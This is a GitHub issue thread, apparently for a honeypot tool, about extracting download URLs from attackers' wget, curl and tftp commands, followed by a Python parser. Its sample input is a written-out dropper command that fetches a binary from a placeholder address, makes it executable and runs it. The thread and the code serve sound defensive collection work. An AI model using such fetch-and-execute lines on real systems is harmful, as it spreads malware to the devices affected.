
Extract links from the commands #5

Open
fe7ch opened this issue Nov 23, 2018 · 2 comments

Comments

@fe7ch
Contributor

fe7ch commented Nov 23, 2018

I've noticed that sometimes the attacker is only executing some commands instead of dropping a binary directly.

The commands usually include a wget/curl call, so it would be nice to parse the command line & try to download the payload.

@fe7ch
Contributor Author

fe7ch commented Nov 23, 2018

As @HermanusF and @bontchev mentioned, this functionality should be optional, so some command line/config option should be present to disable it if needed. Imho it should be turned on by default.

@bontchev
Contributor

Indeed. I was thinking of the following: split the input line by the semicolon character; for each part, check if it begins with (optionally) busybox, followed by wget, curl or tftp. Then extract the URL from the command (this is particularly hard for tftp; the others can be handled just with a regular expression), download the file (optionally) and save it in the usual format (file name derived from the hash of its contents). Maybe log if the download was successful (e.g., it might fail if the repository from where it tries to download no longer exists).
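One way to implement the parsing sketched above, as an added example that is not part of this project's code: it splits the captured line, strips an optional busybox prefix, pulls the URL out of wget/curl calls with a regular expression and out of the two common tftp forms by walking the arguments. It goes slightly beyond the comment by also splitting on `&&`, `||`, `|` and newlines; the sample command line and its TEST-NET address are constructed, and the optional download and hash-named save step is left out so the code runs offline.

```python
import re
import shlex
from typing import List, Optional

# The comment splits on ';'; '&&', '||', '|' and newlines are added here because droppers chain commands with them too.
_SEPARATORS = re.compile(r"\s*(?:;|&&|\|\||\||\n)\s*")
_URL = re.compile(r"(?:https?|ftp)://[^\s'\"<>;|&]+", re.IGNORECASE)

# Constructed sample in the shape the issue describes (TEST-NET address, not a real host).
SAMPLE = ("cd /tmp; /bin/busybox wget http://203.0.113.5/bins/x86 -O x86 || "
          "curl -sO http://203.0.113.5/bins/x86; chmod +x x86; ./x86; "
          "tftp -g -l x.sh -r x.sh 203.0.113.5; tftp 203.0.113.5 -c get y.sh")

def _tokens(segment: str) -> List[str]:
    try:
        return shlex.split(segment)
    except ValueError:  # unbalanced quote: the naive split cut a quoted string
        return segment.split()

def _tftp_url(args: List[str]) -> Optional[str]:
    # BusyBox 'tftp -g [-l LOCAL] -r REMOTE HOST' or tftp-hpa 'tftp HOST -c get REMOTE'.
    remote, positional, i = None, [], 0
    while i < len(args):
        arg = args[i]
        if arg == "-r" and i + 1 < len(args):
            remote, i = args[i + 1], i + 2
        elif arg == "-c" and i + 2 < len(args) and args[i + 1] == "get":
            remote, i = args[i + 2], i + 3
        elif arg == "-l" and i + 1 < len(args):
            i += 2  # local file name, not part of the URL
        else:
            if not arg.startswith("-"):  # skip flags such as -g
                positional.append(arg)  # HOST, then optional PORT
            i += 1
    return f"tftp://{positional[0]}/{remote}" if positional and remote else None

def extract_download_urls(cmdline: str) -> List[str]:
    """Distinct URLs that the wget/curl/tftp calls in cmdline would fetch."""
    found: List[str] = []
    for segment in _SEPARATORS.split(cmdline):
        toks = _tokens(segment)
        if toks and toks[0].rsplit("/", 1)[-1] == "busybox":
            toks = toks[1:]  # optional 'busybox' or '/bin/busybox' wrapper
        tool = toks[0].rsplit("/", 1)[-1] if toks else ""
        if tool == "tftp":
            found += filter(None, [_tftp_url(toks[1:])])
        elif tool in ("wget", "curl"):
            found += _URL.findall(" ".join(toks[1:]))
    return list(dict.fromkeys(found))  # de-duplicate, keep first-seen order
```

Running `extract_download_urls(SAMPLE)` yields the three distinct URLs the sample would fetch; a tftp call without `-r`/`-c get` yields nothing, which is what the "particularly hard for tftp" remark is about.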
